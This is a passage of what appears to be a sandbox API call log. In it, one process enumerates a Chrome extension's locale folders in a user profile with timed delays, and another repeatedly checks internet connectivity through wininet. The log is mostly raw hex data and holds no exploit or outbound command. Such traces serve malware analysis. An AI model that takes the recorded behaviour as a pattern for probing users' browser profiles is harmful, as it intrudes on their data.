FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xfe\xe4m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01P\xfe\xe4m\xe0\x91\xcf\x01P\xfe\xe4m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\xfe\xe4m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xf2\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,490 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,490 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,570 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\no\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xfe\xe4m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01P\xfe\xe4m\xe0\x91\xcf\x01P\xfe\xe4m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\xfe\xe4m\xe0\x91\xcf\x01\x8c\x9a\xe6m\xe0\x91\xcf\x01\x00\xcc\x97s\xd2\xc7\xcd\x01\x80\x85\xe6m\xe0\x91\xcf\x01\xda\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,570 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,600 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:17,600 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:17,600 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:17,600 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:17,600 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:17,650 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x85\xe6m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\x80\x85\xe6m\xe0\x91\xcf\x01\x80\x85\xe6m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x85\xe6m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x01\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,650 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,730 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,730 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x85\xe6m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xb0\x0c\xe8m\xe0\x91\xcf\x01\xb0\x0c\xe8m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x0c\xe8m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xf6\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,730 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,730 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,920 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,920 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x0c\xe8m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xb0\x0c\xe8m\xe0\x91\xcf\x01\xb0\x0c\xe8m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x0c\xe8m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,920 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,920 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,000 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,000 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x0c\xe8m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xe0\x93\xe9m\xe0\x91\xcf\x01\xe0\x93\xe9m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x93\xe9m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x19\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,000 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,000 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,080 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,080 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x93\xe9m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xe0\x93\xe9m\xe0\x91\xcf\x01\xe0\x93\xe9m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x93\xe9m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01R\x01\x00\x00\x00\x00\x00\x00X\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,080 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,080 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,161 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,161 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x1b\xebm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\x10\x1b\xebm\xe0\x91\xcf\x01\x10\x1b\xebm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x1b\xebm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x12\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,161 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,161 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,241 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,241 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x1b\xebm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\x10\x1b\xebm\xe0\x91\xcf\x01\x10\x1b\xebm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x1b\xebm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x0c\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,241 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,241 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,321 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xa2\xecm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01@\xa2\xecm\xe0\x91\xcf\x01@\xa2\xecm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xa2\xecm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x1f\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,321 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:18,401 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:18,401 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\sv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,401 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xa2\xecm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01@\xa2\xecm\xe0\x91\xcf\x01@\xa2\xecm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xa2\xecm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,401 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00h\x00ty_Scah\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00r\x00r\x00i\x00f\x00h\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xefm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,401 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,481 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,481 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01d\x01\x00\x00\x00\x00\x00\x00h\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,481 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,481 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,561 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,561 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01p)\xeem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p)\xeem\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x0e\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,561 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,561 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,691 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xefm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xefm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01a\x01\x00\x00\x00\x00\x00\x00h\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,691 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,771 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,771 | 504 | NtQueryDirectoryFile |
